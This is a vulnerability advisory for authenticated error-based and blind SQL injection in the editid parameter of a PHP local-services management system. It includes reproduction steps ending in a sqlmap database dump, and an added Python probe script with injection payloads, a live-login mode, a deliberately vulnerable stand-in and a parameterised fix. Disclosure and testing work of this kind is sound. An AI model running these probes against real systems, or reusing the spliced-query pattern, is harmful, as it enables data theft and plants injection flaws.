Authenticated Blind & Error-based SQL injection in Local Services Search Engine Management System v1.0
Product: LSSMES-V1.0
Vulnerability Title: Authenticated Blind & Error-based SQLi
Identifier: OWASP Top 10: Injection
Detailed description: When a category is updated through the admin panel, edit-category-detail.php is requested with GET and receives the editid parameter alongside the other form fields. The editid value is used in the SQL query without sanitisation, so a logged-in admin can inject into it and, through error-based or boolean-based blind injection, dump all data from the database. Exploitation requires admin credentials (or a valid admin session).
Steps to reproduce:
1. Log in to the admin panel of LSSMES-V1.0 at http://server_ip/LSSMES/lssems/admin/login.php
2. Go to Service Category → Manage Category and open an existing category for editing; the edit page edit-category-detail.php is loaded with GET and carries the editid parameter.
3. Append a single double quote to the editid value. The page breaks and the Update button disappears, which confirms the SQL injection (as shown in the image below).
4. Once editid is confirmed injectable, capture the authenticated request (including the admin session cookie) and pass it to sqlmap with editid as the injection point to enumerate and dump the database.
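The probe sequence from steps 3 and 4, written out as an added example (this is not the advisory's own PoC and not LSSMES code). It sends the advisory's lone double quote as the error probe and adds a boolean-blind pair for each of the two ways editid may reach the query (spliced in unquoted, or inside double quotes), then decides injectability from whether the Update button survives. Assumptions: the login form fields are named username/password/login (check the real form), the Update button is an input/button with value "Update", and the offline stand-in uses a constructed SQLite table named category, which is not the application's real schema.

```python
"""Probe the editid parameter of edit-category-detail.php for SQL injection.

Added example, not part of the original advisory or of LSSMES. Runs offline
against a constructed stand-in for the vulnerable page; pass base_url, user and
password on the command line to run it against a live instance instead.
"""
import re
import sqlite3
import sys

UPDATE_BTN = re.compile(r'<(?:input|button)[^>]*\bvalue=["\']Update["\']', re.I)

# Payloads for the two likely query contexts. The lone double quote is the
# advisory's own error probe and breaks either context; the true/false pairs
# give a boolean-blind signal: the form must survive "true" and vanish on "false".
PROBES = {
    "numeric": {"baseline": "1", "error": '1"', "true": "1 AND 1=1", "false": "1 AND 1=2"},
    "quoted":  {"baseline": "1", "error": '1"', "true": '1" AND "1"="1', "false": '1" AND "1"="2'},
}


def has_update_button(html):
    """The page-level oracle the advisory uses: is the Update button rendered?"""
    return UPDATE_BTN.search(html) is not None


def classify(pages):
    """pages maps baseline/error/true/false to the HTML each payload produced."""
    b, e, t, f = (has_update_button(pages[k]) for k in ("baseline", "error", "true", "false"))
    return {"error_based": b and not e, "boolean_blind": b and t and not f}


def probe(fetch):
    """fetch(editid) -> html. Returns a verdict for each query context."""
    return {ctx: classify({k: fetch(v) for k, v in ps.items()}) for ctx, ps in PROBES.items()}


def live_fetcher(base, user, pw):
    """Log in and return a fetch() bound to the admin session (field names assumed)."""
    import requests  # pip install requests; only needed for a live run
    s = requests.Session()
    s.post(f"{base}/admin/login.php", data={"username": user, "password": pw, "login": ""})
    return lambda editid: s.get(f"{base}/admin/edit-category-detail.php",
                                params={"editid": editid}).text


# --- constructed stand-in for the vulnerable page, so the probe runs offline ---
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT)")  # assumed schema
    db.execute("INSERT INTO category VALUES (1, 'Plumbing')")
    return db


def vulnerable_app(db):
    """Mimics edit-category-detail.php: editid is spliced straight into the SQL."""
    def fetch(editid):
        try:
            row = db.execute(f"SELECT name FROM category WHERE id={editid}").fetchone()
        except sqlite3.Error as exc:          # syntax error -> page without the form
            return f"<html><body>Error: {exc}</body></html>"
        if row is None:                       # no row -> form rendered without Update
            return "<html><body><form></form></body></html>"
        return f'<form><input name="name" value="{row[0]}"><input type="submit" value="Update"></form>'
    return fetch


def hardened_query(db, editid):
    """The fix: bind editid as a parameter so it can never change the SQL."""
    return db.execute("SELECT name FROM category WHERE id=?", (editid,)).fetchone()


if __name__ == "__main__":
    fetch = live_fetcher(*sys.argv[1:4]) if len(sys.argv) == 4 else vulnerable_app(make_db())
    print(probe(fetch))
```

Against the stand-in the numeric context reports both error-based and boolean-blind injection, while the quoted pair only trips the error probe (both of its conditions are syntax errors in a numeric context), which is how you tell the two contexts apart before handing the request to sqlmap. The parameterised query in hardened_query is the change the application needs.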
Linkedin Profile: https://www.linkedin.com/in/tushar-vaidya-2111s5/
